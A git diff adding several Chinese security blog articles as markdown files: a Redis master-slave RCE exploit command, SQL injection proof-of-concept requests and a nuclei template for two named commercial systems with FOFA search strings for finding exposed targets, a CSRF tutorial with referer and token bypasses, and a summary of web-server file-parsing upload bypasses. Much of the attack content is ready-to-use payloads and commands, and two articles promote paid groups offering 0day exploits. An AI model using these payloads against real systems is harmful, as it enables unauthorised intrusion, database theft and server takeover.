+从原理上来看,主从复制需要两台redis,攻击者控制master,靶机设置为slaveof master。实际利用中可以用python脚本模拟redis服务。 + +exp地址 https://github.com/vulhub/redis-rogue-getshell +``` +python3 redis-master.py -r 101.43.138.109 -p 8080 -L 101.43.138.109 -P 2333 -f RedisModulesSDK/exp/exp.so -c "whoami" + +``` + +[![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5PuHbic0Rp9RA1zKFsMTnvY3a166Da6f0KhGyLV3GRb28D2W3iciboZsgGw/640?wx_fmt=png&from=appmsg "") +使用system.exec执行了命令 + +可以看到so文件被同步到了靶机 + +[![](https://mmbiz.qpic.cn/sz_mmbiz_png/q6x2tyau75N4icibPuiaW5Bqx6Dpg1OXV5PtrYtPrHiawJib1gso0ibNg19qE0zOic36iaBwzbP3kbE0kB2piafnhQSIibEQ/640?wx_fmt=png&from=appmsg "") + + + +请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。 + diff --git a/doc/「漏洞复现」万能门店小程序管理系统 doPageGetFormList SQL注入漏洞.md b/doc/「漏洞复现」万能门店小程序管理系统 doPageGetFormList SQL注入漏洞.md new file mode 100644 index 00000000..057e0741 --- /dev/null +++ b/doc/「漏洞复现」万能门店小程序管理系统 doPageGetFormList SQL注入漏洞.md @@ -0,0 +1,128 @@ +# 「漏洞复现」万能门店小程序管理系统 doPageGetFormList SQL注入漏洞 +冷漠安全 冷漠安全 2024-11-25 02:58 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0pFeDPJNnYaE7pYibBLQrUbLZwqelcotCqhYf0seBKfHroSUm8XuHyka5I3SmicWcJYUpZbFmxJCZ1Q/640?wx_fmt=gif&from=appmsg "") + +**0x01 免责声明** + +**免责声明** + +请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!! + +0x02 + +**产品介绍** + +万能门店小程序管理系统是一款功能强大的工具,旨在为各行业商家提供线上线下融合的全方位解决方案。是一个集成了会员管理和会员营销两大核心功能的综合性平台。它支持多行业使用,通过后台一键切换版本,满足不同行业商家的个性化需求。该系统采用轻量后台,搭载高效服务器,确保小程序运行流畅,提升用户体验。 + +0x03 + +**漏洞威胁** + +万能门店小程序管理系统 doPageGetFormList 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +0x04 + +**漏洞环境** + +FOFA: +``` +body="/comhome/cases/index.html" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qK1MnB4gmZhgq6cK8rldjxvDxeekzaa7nyofvXSGADkWNdNnQ6xGU11cAvSJH9sOKa2XHokCGAfQ/640?wx_fmt=png&from=appmsg "") + + +0x05 + +**漏洞复现** + +PoC +``` +POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1 +Host: +POST /api/wxapps/doPageGetFormList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded + + +suid=' AND GTID_SUBSET(CONCAT((SELECT (VERSION()))),1)-- bdmV +``` + +查询数据库版本 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qK1MnB4gmZhgq6cK8rldjxc5aUUOMibzrRjGHJJP3fA5sj4cbN9tx9LUY8Q0zEFGGjYtZvyOhNRyg/640?wx_fmt=png&from=appmsg "") + + +0x06 + +**批量脚本验证** + +Nuclei验证脚本已发布 +知识星球:冷漠安全 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qK1MnB4gmZhgq6cK8rldjxF5o8bFibECl3mfofxRWib05CBpqpewicZvAmXsXS59a33DYBIBGjYUWaQ/640?wx_fmt=png&from=appmsg "") + + +0x07 + +**修复建议** + +关闭互联网暴露面或接口设置访问权限 + +升级至安全版本 + +0x08 + +**加入我们** + +漏洞详情及批量检测POC工具请前往知识星球获取 + +知识星球:冷漠安全交个朋友,限时优惠券:加入立减25星球福利:每天更新最新漏洞POC、资料文献、内部工具等 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0qK1MnB4gmZhgq6cK8rldjxfcpJrFx8gET7qBeR2xLic9Wz0U96xv5Vibv8aFlImOZiaACmQbibStAmNg/640?wx_fmt=png&from=appmsg "") + + +「星球介绍」: + +本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。 + +本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。 + +本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。 + + +「星球服务」: + + +加入星球,你会获得: + + +♦ 批量验证漏洞POC脚本 + + +♦ 0day、1day分享 + + +♦ 汇集其它付费星球资源分享 + + +♦ 大量的红蓝对抗实战资源 + + +♦ 优秀的内部红蓝工具及插件 + + +♦ 综合类别优秀Wiki文库及漏洞库 + + +♦ 提问及技术交流 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0qK1MnB4gmZhgq6cK8rldjxBibGN1ZdrpibVUIYFaiae2Jq0HibRibjldYwuRm88gfA7pk39Pe4fuLDWuQ/640?wx_fmt=gif&from=appmsg "") + + diff --git a/doc/【SQL注入】用友NC process SQL注入漏洞.md b/doc/【SQL注入】用友NC process SQL注入漏洞.md new file mode 100644 index 00000000..708bf369 --- /dev/null +++ b/doc/【SQL注入】用友NC process SQL注入漏洞.md @@ -0,0 +1,139 @@ +# 【SQL注入】用友NC process SQL注入漏洞 +原创 1ang 小羊安全屋 2024-11-25 06:49 + +导言 + + +文章仅用作网络安全人员对自己网站、服务器等进行自查检测,不可用于其他用途,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。切勿用于网络攻击!!! + +![](https://mmbiz.qpic.cn/mmbiz_jpg/reg3T0Fqiax8lPLzcDQicIfv49r4EgibnRuz10rNYiaBDlUaSfqrWgYrD36DPE4uiar4kHLq7x60wPaguey7Pz8BTOA/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1 "") + +PART  + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/ktKCAuwAa8dmj6TprnPZe7wiasyw7EtyLyNy649qJ3lfwTtxWSKPhdzSJ7JicAxfkYSlAawXNCOmzhS3Rib2ZradA/640?wx_fmt=gif "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/bBPjSTVLnXbhGFgqz3CwuWdGELjD7wYzxM9mrvz9tUBAwaeMof26ca9fSicRezRV3vKt7a04AfuPcLoVBtgpYDw/640?wx_fmt=gif "") + +漏洞描述 + +用友NC /portal/pt/task/process 接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/3RSJOISXa6jxhSggXrE9ibwcuRuSia2kIsFAHRbtYf5eb0O4TtXqn4yweC65OpzNRdrrnrkEYbjdqUkg9eIQVkHA/640?wx_fmt=gif "") + +漏洞复现 + +漏洞URL:/portal/pt/task/process + +漏洞参数:pluginid + +F  O F A:icon_hash="1085941792" + +漏洞详情: + +1、打开系统 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/lnzwRq0p4icHhia4pKK3z7TIOicqicCibwliaLULNcS1TqibAicAEFQnBz9SibqianzrfZPrhJ9vJiaZUtbjVQbXJSUXE6Dsg/640?wx_fmt=png&from=appmsg "") + +2、使用poc进行检测 +``` +POST /portal/pt/task/process?pageId=login HTTP/1.1 +Host: 127.0.0.1:5001 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=A7ED8D2420C0517E62D9552E4831698B.server +Content-Type: application/x-www-form-urlencoded +Content-Length: 279 + + +id=1&oracle=1&pluginid=1{{urlescape(' AND 7194=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7194=7194) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- dJyN)}} +``` + +2、漏洞利用成功 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/lnzwRq0p4icHhia4pKK3z7TIOicqicCibwliaLt2ASKh7ZWakibSnf7GmXaFhSvn7uTCRq4QywEUqVYZHAycDRHibic5ZdQ/640?wx_fmt=png&from=appmsg "") + +nuclei脚本 +``` +id: 用友NC processSQL注入 + +info: + name: 用友NC processSQL注入 + author: 1ang + severity: high + description: description + reference: + - https:// + tags: tags + +http: + - raw: + - |- + POST /portal/pt/task/process?pageId=login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0 + Accept: */* + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Connection: close + Cookie: JSESSIONID=A7ED8D2420C0517E62D9552E4831698B.server + Content-Type: application/x-www-form-urlencoded + Content-Length: 279 + + + id=1&oracle=1&pluginid=1{{urlescape(' AND 7194=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7194=7194) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(120)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- dJyN)}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - qqbbq1qxxqq + - type: status + status: +          - 200 +``` + + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/bBPjSTVLnXbhGFgqz3CwuWdGELjD7wYzxM9mrvz9tUBAwaeMof26ca9fSicRezRV3vKt7a04AfuPcLoVBtgpYDw/640?wx_fmt=gif "") + +修复建议 + +1、升级到最新版本; + +2、关闭系统互联网访问权限,或使用白名单访问。 +  + + +![](https://mmbiz.qpic.cn/mmbiz_png/3YqocLTzbGQjus64G8bmAyDCiaaE8IY57OmvR7bHq1UzAqRG0gme38uvdXggrrlmNJyePh4Ox1AI9oQ1PY8otRw/640?wx_fmt=png "") + +![](https://mmbiz.qpic.cn/mmbiz_png/zQTAicxBBI1QaAzOgiblQicVnO8XZUWj6cpdOL8EHU0unLP9fGEBxdTZDXfHeeEGGibNzMYfxDgtyicKv8r5Q18UsyQ/640?wx_fmt=png "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/ibpQMTribKicf2Xibe2qFYgtMw8UhDdllzZryYjianfS4LcHCAT7VWbjwoaZNF4lCAxUmFdIibmUrBibToxxt9QbGf3WQ/640?wx_fmt=png "") + +个人星球,欢迎加入 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lnzwRq0p4icF88zkXzrnATODaPrYYSZ1ZUyicl3UZSdda9RxiavwPXEWfdn5WiboAA7HiavEZblfA9CLsFQKlxsU8Xg/640?wx_fmt=jpeg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/2TVkuiaNYQGjWwnsmctvTmClxYzHJicxBiahOibtjQicH8vaCz7TPFMK0EsiczbQfwzlSNiaaU8akYibuIdpUCicYoFGZNQ/640?wx_fmt=png "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/1C21KZjMBaSHgMAvP4faiar3XTekytaNKOlc7UibOhTqxaA0iapiabBKVITYicR4NM125QTp9lYt9lylfI7LzfqkLsg/640?wx_fmt=png "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uNpMBR1pZOia18Kuib6Qukssk36955zGygr0vKFbclQLHMRSJqic5s7waKZlJrto2oTb42sYY7icxo5zcn24MjDSfA/640?wx_fmt=png "") + + + + +**——The  End——** + +![](https://mmbiz.qpic.cn/mmbiz_gif/b96CibCt70iaZREh6DtDyA9wcDsp0m1RNV9C4uiaagltPDn83s3k6Sw5DbfRWdGc25Q1WDNCpjZLXQpCxFfiaGT5ag/640?wx_fmt=gif "") + + diff --git a/doc/一文读懂CSRF漏洞.md b/doc/一文读懂CSRF漏洞.md new file mode 100644 index 00000000..94dc0700 --- /dev/null +++ b/doc/一文读懂CSRF漏洞.md @@ -0,0 +1,69 @@ +# 一文读懂CSRF漏洞 +simple学安全 simple学安全 2024-11-25 06:38 + +目录 + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzIUPBl1F3hZk17KqG2NxgUrLR7zic08MBTwicG9qyrIj2POcNzhPaALdg/640?wx_fmt=png&from=appmsg "") + +简介 + +CSRF漏洞全称跨站请求伪造漏洞,攻击者利用目标用户的身份,以目标用户的名义执行相关操作。在目标用户登录了网站的前提下,点击攻击者发送的恶意url,才能触发漏洞。 + +常见的修改密码、分享文章、点赞、发信息等功能处,都可能存在CSRF漏洞。 + +漏洞利用 + +测试CSRF漏洞,主要是使用BurpSuite自带的Generate CSRF PoC功能,这里以DVWA靶场的CSRF漏洞为例。 + +1)这是一个修改密码的功能,输入新密码,点击change即可修改密码,这里进行抓包如下 + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKz8bAXj02djy0heyDsL7pQ5YpMUWpJD24WMs7C8CsmFG9hlhyHBmxRAA/640?wx_fmt=png&from=appmsg "") + +2)直接右键单击请求包,选择Engagement tools-> +Generate + CSRF PoC + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKz0tfY8VyXnPqzQVjtEYXRf0GNylY0ECh1X82omlJstvpFRhO50V8Ubw/640?wx_fmt=png&from=appmsg "") + +3)在弹出的窗口中点击Copy HTML,将复制的内容保存为change.html文件 + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzn13a9YcMicpr2sDonzY4DmtbW7n9Yp7a4iccPkAQeD4vvAXicS4gXrC6A/640?wx_fmt=png&from=appmsg "") + +4)模拟受害者在登录的情况下访问了该html,点击Submit request, + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzNUR1dc8ia1DL4j1rbrJwXElFCV0KEichM0SFoULFqPpN8J6GOg7uYmnA/640?wx_fmt=png&from=appmsg "") + +5)可以看到受害者密码被成功修改 + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzYnwJoImicsfx4mNq0ick8r09AdSot32edTZhT2uuEzmoYJpwsDrY4QoQ/640?wx_fmt=png&from=appmsg "") + +CSRF绕过 + +1、**绕过Referer限制** + +1)若验证referer字段是否包含网站域名a.com,可以尝试自己申请一个域名b.com,然后添加子域名:a.com.b.com 尝试绕过 + +2)若验证referer字段是否包含host,也是同样的方法,添加子域名:192.168.1.1.b.com + +3)直接将referer字段删除 + +2、**绕过token限制** + +1)将token字段删除或者置空 + +2)使用固定的csrf_token,若服务器只检查csrf_token是否有值,而不与当前用户做匹配,则可能绕过 + +修复建议 + +1、验证请求的referer值 + +2、使用token验证,服务器端验证该token,与用户一致方可通过 + +3、添加二次确认,比如修改密码时需要验证码 + +END + +**查看更多精彩内容,关注** +**simple学安全** + + diff --git a/doc/文件解析常见漏洞总结.md b/doc/文件解析常见漏洞总结.md new file mode 100644 index 00000000..9b5345e4 --- /dev/null +++ b/doc/文件解析常见漏洞总结.md @@ -0,0 +1,321 @@ +# 文件解析常见漏洞总结 +unic0rn 篝火信安 2024-11-25 02:00 + +文件解析漏洞主要由于网站管理员操作不当或者Web容器自身的漏洞,导致一些特殊构造的其他格式文件被 IIS、apache、nginx 或其他 Web容器在某种情况下解释成脚本文件执行,导致黑客可以利用该漏洞实现非法文件的解析。 + +本文总结一些常见Web中间件的文件解析漏洞。 + +![](https://mmbiz.qpic.cn/mmbiz_gif/CQf7uHzmVb1a36bBqjd11w2NQk1tzN9l3lG0z0TXCnVnQQNCVxIM3OWnmTR6lfLib2xQqps6Zub34WHdJbKQNQQ/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/CQf7uHzmVb3IBO7OIGicnNqnYQRNut4XBiaDfwHSdRPI0w0dwf1BSjv1naGXjuCricG5FTxN2qEcASZaLicPicVSbvA/640?wx_fmt=png&from=appmsg "") +## 一、IIS 6.0 + +使用6.x版本的服务器,大多为Windows +server 2003,网站比较古老,开发语言一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。 +### 1、目录解析:/x.asp/x.jpg + +x.jpg可替换为任意文本文件(如x.txt),文本内容为后门代码。 + +IIS 6.0 默认会把.asp,.asa目录下的文件都解析成asp文件。 + +### 2、后缀解析:/x.asp;.jpg + +IIS 6.0 默认不解析;号后面的内容,因此x.asp;.jpg便被解析成asp文件。 + +### 3、默认解析:/x.asa,/x.cer,/x.cdx + +IIS 6.0 默认配置中,**可执行文件除了.asp还包含这三种.asa  .cer  .cdx,这几个后缀默认由 asp.dll 来解析**,所以执行权限和.asp后缀一样,可在配置中自行删除该后缀,以防止安全隐患。 + +可结合目录解析漏洞利用,如 /x.asa/x.jpg 或 /x.cer/x.jpg 或 /x.asa;.jpg。 + +### 4、修复方案 + +1、目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传x.asp;.jpg类型的文件名。 + +2、做好权限设置,限制用户创建文件夹。 + +## 二、IIS 7.0、IIS 7.5、Nginx <8.03 +### 1、PHP解析漏洞 + +php的配置文件 php.ini 文件中开启了 cgi.fix_pathinfo, +/etc/php5/fpm/pool.d/www.conf中不正确的配置security.limit_extensions, +导致允许将其他格式文件作为php解析执行。 + +**做个测试** + +在本地环境中,新建一个文件phpinfo.jpg,内容为:,通过访问http://127.0.0.1/phpinfo.jpg/.php,会正常执行恶意代码。 + +![](https://mmbiz.qpic.cn/mmbiz_png/CQf7uHzmVb3IBO7OIGicnNqnYQRNut4XBUoYG1XibqZmnN8Wz6vCWlqSK18LDbBH8tia2pd41YKLEPjWibvsodzk9g/640?wx_fmt=png&from=appmsg "") + + +但在nginx<8.03环境中,新建一个文件test.jpg,直接访问显示图片解析错误。在浏览器中访问/test.jpg/test.php ,则显示Access denied.。 + + +问题来了,test.jpg是文件不是目录,test.php更是根本就不存在的文件,访问/test.jpg/test.php没有报404,而是显示Access denied.。 + +![](https://mmbiz.qpic.cn/mmbiz_png/CQf7uHzmVb2fuR5KibAzuBhoDaoDQbL0g6micQx1PwS53aszSKjApIPKKrW3kvqPx2rxW0uJLhCc42Bs8454iafkw/640?wx_fmt=png&from=appmsg "") + +原因在于,Nginx拿到URI(/test.jpg/test.php) 后,识别后缀是.php,直接转交给php去处理。php判断/test.jpg/test.php不存在,便删去最后的/test.php,继续判断/test.jpg存在,便把/test.jpg当成要执行的文件,又因为后缀为.jpg,php认为这不是php文件,于是返回Access +denied.。 + +这其中涉及到php的一个选项:cgi.fix_pathinfo,该值默认为1,表示开启。**开启这一选项后PHP对文件路径采用从右向左的判断逻辑进行处理。以/为分隔逐层判断文件是否存在,直到判断到存在的那个路径。**所以导致php会去尝试解析test.jpg。 + +该选项在配置文件php.ini中。若是关闭该选项,访问 /test.jpg/test.php 只会返回找不到文件。但关闭该选项很可能会导致一些其他错误,所以一般默认是开启的。 + +**漏洞形式:/x.jpg/x.php** + +另外一种利用方式是上传一个名字为test.jpg,以下是文件的内容: + +');?> + +然后访问 test.jpg/.php,在这个目录下就会生成一句话木马shell.php。 + +``` +图片马利用方法: +将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾。 +例:copy xx.jpg/b + yy.txt/a xy.jpg +/b 即二进制[binary]模式 +/a 即ascii模式 xx.jpg正常图片文件 +``` + +新版本的php引入了security.limit_extensions ,限制了可执行文件的后缀,默认只允许执行.php文件。 + +这一漏洞是**由于Nginx中php配置不当而造成的,与Nginx版本无关,但在高版本的php中,由于security.limit_extensions 的引入,使得该漏洞难以被成功利用。** + +IIS在这一点和Nginx是一样的,同样存在这一问题。而**如Apache等,会先看该文件是否存在,若存在则再决定该如何处理。**cgi.fix_pathinfo是php具有的,若在php前便已正确判断了文件是否存在,cgi.fix_pathinfo便派不上用场了,这一问题自然也就不存在了。 + +### 2、IIS相关的解析漏洞 + +IIS7.5 的漏洞与 nginx 的类似,都是由于 php 配置文件中,开启了 cgi.fix_pathinfo,而这并不是 nginx 或者 iis7.5 本身的漏洞。 + +跟 nginx 解析漏洞一样,利用的条件是 php.ini => cgi.fix_pathinfo=1 开启的情况才会产生。 + +可以配合操作系统文件命名规则,上传不符合 windows 文件命名规则的文件名。 + +如: +- test.asp. + +- test.asp(空格) + +- test.php:1.jpg + +- test.php:: $DATA + +会被 windows 系统自动去掉不符合规则符号后面的内容,然后再配合这个解析漏洞来执行文件。 + +### 修复方案 + +1、修改php.ini文件,将cgi.fix_pathinfo的值设置为0; + +2、在Nginx配置文件中添加以下代码: +``` +if ( $fastcgi_script_name ~ ..*/.*php ) { +  return 403; +} +``` + +这行代码的意思是当匹配到类似test.jpg/a.php的URL时,将返回403错误代码。 + + + +## 三、Nginx +### +### 1、%00空字节代码解析漏洞 + +Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码。 + + +**环境要求:** + +php < 5.3.4 + +Nginx 0.5.* + +Nginx 0.6.* + +Nginx 0.7 <= 0.7.65 + +Nginx 0.8 <= 0.8.37 + + +**漏洞形式:** + +filename=test.php%00.txt + + +1、上传时路径可控,使用00截断 + +2、文件下载时,00截断绕过白名单检查 + +3、文件包含时,00截断后面限制(主要是本地包含时) + +4、其它与文件操作有关的地方都可能使用00截断。 +### +### 二、CVE-2013-4547(%20%00) + +非法字符空格和截止符(%00)会导致Nginx解析URI时的有限状态机混乱,危害是允许攻击者通过一个非编码空格绕过后缀名限制。 + + +影响nginx版本:nginx +0.8.41 ~ 1.5.6 + + +**漏洞形式** + +http://127.0.0.1/file.jpg \0.php + +这样会让Nginx认为文件“file.jpg ”的后缀为“.php”。 + + +**做个测试** + +在Nginx/1.0.15的环境中,准备文件“test.jpg ”(注意文件名的最后一个字符是空格),文件内容为:。 + +用Burp Suite抓包并修改,原本的URL是:http://*.*.*.*/test.jpg...php,将jpg后的第一个“.”改为20,第二个“.”改为00。 + +![](https://mmbiz.qpic.cn/mmbiz_png/CQf7uHzmVb3IBO7OIGicnNqnYQRNut4XBDAHibK7Fo3GMTgf3M28kmFokMn4hsavV8ySfAtqygGzn8A9ua6iao3vA/640?wx_fmt=png&from=appmsg "") + + + +修改完毕后 Forword 该请求,在浏览器中看到返回phpinfo的结果。 + + +## 四、Apache + +### 1、后缀解析:test.php.x1.x2.x3 + +Apache的文件解析规则是从右至左判断后缀是否可以解析,若x3非可识别后缀,再判断x2,直到找到可识别后缀为止,然后将该可识别后缀进解析。 + +#### 修复方案 + +后缀验证尽量使用白名单的方式,这样即使使用不存在的后缀名,也无法绕过。 +### +### 2、配置问题导致漏洞 + +1、如果在Apache的conf里有这样一行配置 AddHandler php5-script.php + +这时只要文件名里包含.php即使文件名是xx.php.jpg也会以php来执行。 + +2、如果在Apache的conf里有这样一行配置 AddType application/x-httpd-php +.jpg + +即使扩展名是jpg,一样能以php来执行。 + +#### 修复方案 + +1、apache配置文件,禁止.php.这样的文件执行,配置文件里面加入 +``` + +Order Allow,Deny +Deny from all + +``` + +2、用伪静态能解决这个问题,重写类似.php.*这类文件,打开apache的httpd.conf找到 LoadModule +rewrite_module modules/mod_rewrite.so + +把#号去掉,重启apache,在网站根目录下建立.htaccess文件,代码如下: +``` + +RewriteEngine On +RewriteRule .(php.|php3.) /index.php +RewriteRule .(pHp.|pHp3.) /index.php +RewriteRule .(phP.|phP3.) /index.php +RewriteRule .(Php.|Php3.) /index.php +RewriteRule .(PHp.|PHp3.) /index.php +RewriteRule .(PhP.|PhP3.) /index.php +RewriteRule .(pHP.|pHP3.) /index.php +RewriteRule .(PHP.|PHP3.) /index.php + +``` + +### 3、罕见后缀 + +还记得mime.types文件吗?在该文件中搜索“php”这三个字母,结果如下所示: +``` +:~$ cat /etc/mime.types | grep php +#application/x-httpd-php phtml pht php +#application/x-httpd-php-source phps +#application/x-httpd-php3 php3 +#application/x-httpd-php3-preprocessed php3p +#application/x-httpd-php4 php4 +#application/x-httpd-php5 php5 +``` + +Apache 配置文件中会有.+.ph(p[345]?|t|tml)此类的正则表达式,被当php程序执行的文件名要符合正则表达式,也就是说**php3,php4,php5,pht,phtml也是可以被解析的**。 + +### 4、.htaccess文件 + +一般来说,配置文件的作用范围都是全局的,但 Apache 提供了一种很方便的、可作用于当前目录及其子目录的配置文件—— .htaccess(分布式配置文件)。 + +要想使.htaccess文件生效,需要两个条件: + +一是在Apache的配置文件httpd.conf中写上: + +AllowOverrideAll + +若这样写则.htaccess不会生效: + +AllowOverrideNone + + +二是 Apache 要加载mod_Rewrite 模块。加载该模块,需要在Apache的配置文件中写上: + +LoadModulerewrite_module/usr/lib/apache2/modules/mod_rewrite.so + +若是在Ubuntu中,可能还需要执行命令: + +sudoa2enmod rewrite + +配置完后需要重启 Apache。 +> .htaccess 文件可以配置很多事情,如是否开启站点的图片缓存、自定义错误页面、自定义默认文档、设置WWW域名重定向、设置网页重定向、设置图片防盗链和访问权限控制。但我们这里只关心.htaccess 文件的一个作用—— MIME 类型修改。 + + + +如在 .htaccess 文件中写入: +``` +AddType application/x-httpd-php .xxx +``` + +该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件。 + +另一种写法是: +``` + +SetHandlerapplication/x-httpd-php + +``` + +该语句会让 Apache 把shell.jpg 文件当作 php 文件来解析。 + + + +## 五、lighttpd + +类似于最上面的Nginx的解析漏洞; + +漏洞形式:x.jpg/x.php + +## 六、其他解析漏洞 + +在Windows环境下,**x.jpg[空格] 或x.jpg. 这两类文件都是不允许存在的,若这样命名,Windows会默认除去空格或点**,黑客可以抓包修改文件名,在后面加个空格或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,成为可以解析的恶意文件。 + + +PS:以上信息收集于互联网并不保证写的全对哦,如果有错的或遗漏的,欢迎各位师傅帮忙纠正,谢谢! + +![](https://mmbiz.qpic.cn/mmbiz_gif/CQf7uHzmVb1a36bBqjd11w2NQk1tzN9lWGhsCxEo5MQ9FERnsRc00tLlOpTHQ8bicSWic2omFnFUsFstuXyabtDA/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1 "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/CQf7uHzmVb1ibZHu1GGPhASBxFgzNZaS0OzicLMib0enpI59Wic0hgLW7BhlsGXSeGeo3o2IlxQgc1ekO2mCJ9Dt4g/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1 "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/CQf7uHzmVb1ibZHu1GGPhASBxFgzNZaS0juZN1fHqMNvGrUeqNzhVaR0W5HWpbmOfZAoPiaXjnX93hibm7iaHvZ5KA/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1 "") + +**如果您觉得内容还不错的话,请关注我吧!** + + +**建议把公众号“篝火信安”设为星标,否则可能就看不到啦!因为公众号现在只对常读和星标的公众号才能展示大图推送。** + +**操作方法:点击公众号页面右上角的【...】,然后点击【设为星标】即可。** + diff --git a/doc/某大学图书管理系统刷积分逻辑漏洞.md b/doc/某大学图书管理系统刷积分逻辑漏洞.md new file mode 100644 index 00000000..08a173f6 --- /dev/null +++ b/doc/某大学图书管理系统刷积分逻辑漏洞.md @@ -0,0 +1,111 @@ +# 某大学图书管理系统刷积分逻辑漏洞 +原创 zkaq-brooke 掌控安全EDU 2024-11-25 04:01 + +扫码领资料 + +获网安教程 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcrpvQG1VKMy1AQ1oVvUSeZYhLRYCeiaa3KSFkibg5xRjLlkwfIe7loMVfGuINInDQTVa4BibicW0iaTsKw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/b96CibCt70iaaJcib7FH02wTKvoHALAMw4fchVnBLMw4kTQ7B9oUy0RGfiacu34QEZgDpfia0sVmWrHcDZCV1Na5wDQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +# 本文由掌控安全学院 -   brooke 投稿 + +**来****Track安全社区投稿~** + 